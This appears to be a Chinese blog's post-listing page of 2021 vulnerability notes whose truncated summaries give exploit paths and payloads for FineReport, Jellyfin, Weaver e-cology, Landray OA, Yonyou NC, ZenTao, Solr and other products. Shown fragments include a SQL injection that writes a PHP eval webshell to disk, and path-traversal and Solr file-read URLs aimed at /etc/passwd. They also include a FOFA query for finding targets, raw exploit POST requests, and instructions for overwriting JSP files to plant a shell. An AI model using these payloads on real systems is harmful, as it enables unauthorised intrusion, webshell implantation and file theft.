摘要: v10.0版本不受影响 FineReport V9 注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 阅读全文
posted @ 2021-04-09 16:36 逗比大师 阅读(1006) 评论(0) 推荐(0) 编辑
摘要: POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C 阅读全文
posted @ 2021-04-09 16:35 逗比大师 阅读(183) 评论(0) 推荐(0) 编辑
摘要: /api/dbstat/gettablessize /webroot/ReportServer?op=fr_base&cmd=evaluate_formula&expression= 阅读全文
posted @ 2021-04-09 16:34 逗比大师 阅读(287) 评论(0) 推荐(0) 编辑
摘要: https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop 阅读全文
posted @ 2021-04-09 16:33 逗比大师 阅读(655) 评论(0) 推荐(0) 编辑
摘要: FOFA语句: title="Jellyfin" 可以通过访问 http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/ 读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5 阅读全文
posted @ 2021-04-09 16:32 逗比大师 阅读(820) 评论(0) 推荐(0) 编辑
摘要: /synccache.jsp?data=base64编码的java对象 阅读全文
posted @ 2021-04-09 16:30 逗比大师 阅读(269) 评论(0) 推荐(0) 编辑
摘要: 漏洞位于: /page/exportImport/uploadOperation.jsp文件中 Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈 重点关注File file=new File(savepath+filename), Filename参数,是 阅读全文
posted @ 2021-04-09 16:29 逗比大师 阅读(1556) 评论(0) 推荐(0) 编辑
摘要: 漏洞URL: http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpS 阅读全文
posted @ 2021-04-09 16:18 逗比大师 阅读(2113) 评论(0) 推荐(0) 编辑
摘要: /latrix/inandout.php txtaccesscode参数存在SQL注入漏洞 阅读全文
posted @ 2021-04-09 16:16 逗比大师 阅读(49) 评论(0) 推荐(0) 编辑
摘要: 漏洞关注点: /sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode] 漏洞在/sys/search/sys_search_main/sysSearch 阅读全文
posted @ 2021-04-09 16:13 逗比大师 阅读(2799) 评论(0) 推荐(0) 编辑
摘要: 分析发现是去年老洞(https://www.cnblogs.com/0day-li/p/13698863.html) 利用了两个漏洞 1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell 利用方式: def see 阅读全文
posted @ 2021-04-09 16:12 逗比大师 阅读(910) 评论(0) 推荐(0) 编辑
摘要: 管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。 默认用户superman的uid=1POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1 阅读全文
posted @ 2021-04-09 16:11 逗比大师 阅读(357) 评论(0) 推荐(0) 编辑
摘要: 目前测试影响版本:NC6.5 漏洞url为: /service/~xbrl/XbrlPersistenceServlet poc: import requests import threadpool import urllib3 import sys import base64 ip = "" dn 阅读全文
posted @ 2021-04-09 16:10 逗比大师 阅读(1975) 评论(0) 推荐(0) 编辑
摘要: 漏洞url: http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql 阅读全文
posted @ 2021-04-09 16:09 逗比大师 阅读(694) 评论(0) 推荐(0) 编辑
摘要: 访问:http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd (db为存在的应用名) 阅读全文
posted @ 2021-04-09 16:07 逗比大师 阅读(159) 评论(0) 推荐(0) 编辑
摘要: REQUEST: POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: Connection: close Content-Length: 85 Cache-Control: max-age=0 Sec-Ch-Ua: "Google C 阅读全文
posted @ 2021-04-09 16:03 逗比大师 阅读(212) 评论(0) 推荐(0) 编辑